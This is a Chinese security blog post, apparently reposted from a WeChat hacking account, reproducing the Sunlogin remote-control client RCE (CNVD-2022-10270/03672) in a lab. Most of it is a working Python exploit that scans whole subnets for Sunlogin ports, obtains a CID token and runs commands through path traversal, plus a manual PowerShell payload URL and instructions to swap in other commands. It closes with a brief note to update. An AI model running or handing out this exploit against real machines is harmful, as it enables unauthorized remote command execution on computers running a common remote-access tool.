向日葵是生活工作中最常用的一款远程办公工具之一。也是目前国内市面上用的最多的一款工具。本文来谈谈关于其
CNVD-2022-10270/CNVD-2022-03672
漏洞的利用和复现。
实验环境
-
向日葵 <= 11.0.0.33 -
Kali Linux
端口扫描
我们首先在本地环境安装11.0.0.33
的低版本向日葵。安装完成后,并用nmap对靶场进行端口扫描。
nmap -p 45000-55000 192.168.50.105
如下图,我们可以看到目标存在61376
61387
这几个端口。

当然,为了方便我们可以利用python脚本快速检测,支持整个网段扫描。
from concurrent.futures import thread
import IPy
from py import process
import requests
import json
import sys
from subprocess import PIPE, Popen
from multiprocessing.pool import ThreadPool
import argparse
from sympy import re
import re as reg
import time
filename = time.strftime("%Y-%m-%d %H-%M-%S", time.localtime())+"_sunlogin.txt"
def pwn(target):
global vul_list
session = requests.session()
burp0_url = "http://%s/cgi-bin/rpc?action=verify-haras" % target
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0"}
res = json.loads(session.get(burp0_url, headers=burp0_headers).text)
token = res.get('verify_string')
print("[+] Get token: {}".format(token))
burp0_url = "http://%s/check?cmd=ping../../../../../../../../../../../windows/system32/whoami" % target
burp0_cookies = {"CID": token}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1",
"Cache-Control": "max-age=0"}
res = session.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
print("[+] Get command result: rnt %s" % res.text)
with open(file=filename,mode="a") as f:
f.write(target+" Get command result:"+res.text+"n")
def curl(host_WithPort):
url = "http://%s" % host_WithPort
try:
result = requests.get(url,timeout=5)
if result.text == "{"success":false,"msg":"Verification failure"}":
return host_WithPort
except:
pass
def fuzz_sunloginPort(target):
print("[*] %stFuzzing sunlogin port" % target)
process = Popen("nmap -p 10000-65535 --min-rate=10000 -T4 %s" % target, stdout=PIPE, stderr=None, shell=True)
# process = Popen("nmap -p 40000-65535 -T2 %s" % target, stdout=PIPE, stderr=None, shell=True)
ports_raw = process.communicate()[0].decode("utf-8",errors="ignore")
ports = reg.findall("([d]+/tcp)",ports_raw)
for i in range(len(ports)):
ports[i] = ports[i].strip("/tcp")
print("[*] Get ports: %s" % ports)
if not ports:
return
print("[*] Enumerating port of sunlogin")
host_WithPort = [str(target) + ":" + x for x in ports]
tp = ThreadPool(50)
result = tp.map(curl, (host_WithPort))
result_filter = [i for i in result if i]
if result_filter == []:
print("[-] Could not find sunlogin port or target not vulnerable")
return
else:
print("[*] Target may vulnerability, try to pwn it out.")
for i in result_filter:
pwn(i)
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=True, description="Sunlogin client RCE exploit with port fuzzing")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-t','--target', action='store',help="specify target with sunlogin client installed,suport "
"192.168.1.1 or 192.168.1.1/24")
group.add_argument('-f','--file', action='store',help="Specify the destination IP file")
options = parser.parse_args()
if options.target is None and options.file is None:
parser.print_help()
sys.exit(1)
else:
if options.target is None:
with open(file=options.file,mode="r") as f:
hosts = f.readlines()
for ip in hosts:
fuzz_sunloginPort(ip.strip("n"))
else:
if "/" in options.target:
try:
hosts = IPy.IP(options.target)
for host in hosts:
fuzz_sunloginPort(host)
except Exception as e:
print (e)
else:
fuzz_sunloginPort(options.target)

漏洞复现
在浏览器中访问ip
+端口号
+cgi-bin/rpc?action=verify-haras (端口号:每一个都尝试,直到获取到session值CID
)
通过上述方法,我们确定了目标的端口。现在我们便可以利用payload工具进行测试。
payload
http://192.168.50.105:61387/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+whoami
访问paylaod,并在burp中进行抓包。
修改
Cookie:YqRx8XziEo3PCASesFfsfP5tZWk344Zl
为Cookie: CID=YqRx8XziEo3PCASesFfsfP5tZWk344Zl
效果如下:
同样,我们只需修改后面的
whoami
为其他的命令如ipconfig
即可。


安全建议
此漏洞算是比较高危的漏洞,请尽快更新到最新版本。
向日葵(11.0.0.33)版本后台回复【向日葵】获取下载链接。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):向日葵RCE复现(CNVD-2022-10270/CNVD-2022-03672)
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151441.html